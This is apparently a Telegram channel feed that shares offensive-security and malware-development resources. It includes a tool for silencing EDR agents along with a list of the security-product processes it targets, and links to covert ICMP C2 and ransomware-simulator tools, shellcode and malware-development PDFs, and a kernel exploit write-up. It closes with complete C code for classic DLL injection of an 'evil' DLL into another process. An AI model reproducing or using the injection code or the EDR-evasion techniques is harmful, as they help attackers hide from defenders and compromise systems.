Source Byte – Telegram
Sober must be the one who keeps away from love;
this nature of mine does not mix with reason.
Saadi Shirazi 187
[ EDRSilencer ]

A tool that uses the Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server.

EDR list:

Microsoft Defender for Endpoint and Microsoft Defender Antivirus
"MsMpEng.exe",
"MsSense.exe",
Elastic EDR
"elastic-agent.exe",
"elastic-endpoint.exe",
"filebeat.exe",
Trellix EDR
"xagt.exe"

https://github.com/netero1010/EDRSilencer

#EDR

@islemolecule_source
Forwarded from [Channel] Private
x86_harmful.pdf (344.7 KB)
Lolbin Attack & Defense.pdf.pdf (2.6 MB)
📘LOLBIN ATTACK & DEFENSE🛠

@islemolecule_source
#lolbin
#malware_dev
Shellcode_Dvlp.pdf (3.4 MB)
"Shellcode Development", 2023

#shellcode
#malware_dev
@islemolecule_source
analyzing-decompiled-C++vtables-and-objects-in-GCC-binaries.pdf (973.6 KB)
analyzing-decompiled-C++

#reverse

@islemolecule_source
PingRAT: secretly passes C2 traffic through firewalls using ICMP payloads

https://github.com/umutcamliyurt/PingRAT

#c2, #tool, #go
———
@islemolecule_source
PSRansom: a PowerShell Ransomware Simulator with C2 Server capabilities.

https://github.com/JoelGMSec/PSRansom

#c2, #powershell, #simulat, #tool
———
@islemolecule_source
How to break bare metal firmware encryption (FortiGate firewalls) for security research.
Credits: Jon Williams (@bishopfox)

https://bishopfox.com/blog/breaking-fortinet-firmware-encryption

#firewall, #fortigate
———
@islemolecule_source
Detecting and decrypting Sliver C2 – a threat hunter’s guide

https://immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/

#c2
———
@islemolecule_source
Course to get into Large Language Models (LLMs) with roadmaps and Colab notebooks.
credit: @maximelabonne

https://github.com/mlabonne/llm-course/tree/main

#LLM
———
@islemolecule_source
Great Burp Suite series by Meraj Heydari
credit: @meraj_heydari
language: Persian

https://www.youtube.com/playlist?list=PL7ZQRFOOo39A0kV-GK-kFaX2jGA3PMz0-

#burpsuite
———
@islemolecule_source
Exploiting a use-after-free in Linux kernel 5.15 (Ubuntu 22.04) (CVE-2022-32250)

credit: @saidelike

research.nccgroup.com/2022/0

#linux, #kernel, #analysis, #exploitation
———
@islemolecule_source
DLL Injection classic way :)

1- address of the dll
2- allocate a buffer in target process
3- write dll address to that
4- create a thread to execute

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    HANDLE processHandle;
    PVOID remoteBuffer;
    // 1- path of the DLL (L"" literal so it is wide regardless of UNICODE)
    wchar_t dllPath[] = L"C:\\experiments\\evilm64.dll";

    if (argc < 2) {
        printf("Usage: %s <PID>\n", argv[0]);
        return 1;
    }

    printf("Injecting DLL to PID: %i\n", atoi(argv[1]));
    processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)atoi(argv[1]));
    // 2- allocate a buffer in target process
    remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof dllPath, MEM_COMMIT, PAGE_READWRITE);
    // 3- write dll path to that buffer
    WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)dllPath, sizeof dllPath, NULL);
    // 4- create a thread to execute LoadLibraryW on it
    PTHREAD_START_ROUTINE threadStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
    CreateRemoteThread(processHandle, NULL, 0, threadStartRoutineAddress, remoteBuffer, 0, NULL);
    CloseHandle(processHandle);

    return 0;
}
iredteam
#malware_dev

@islemolecule_source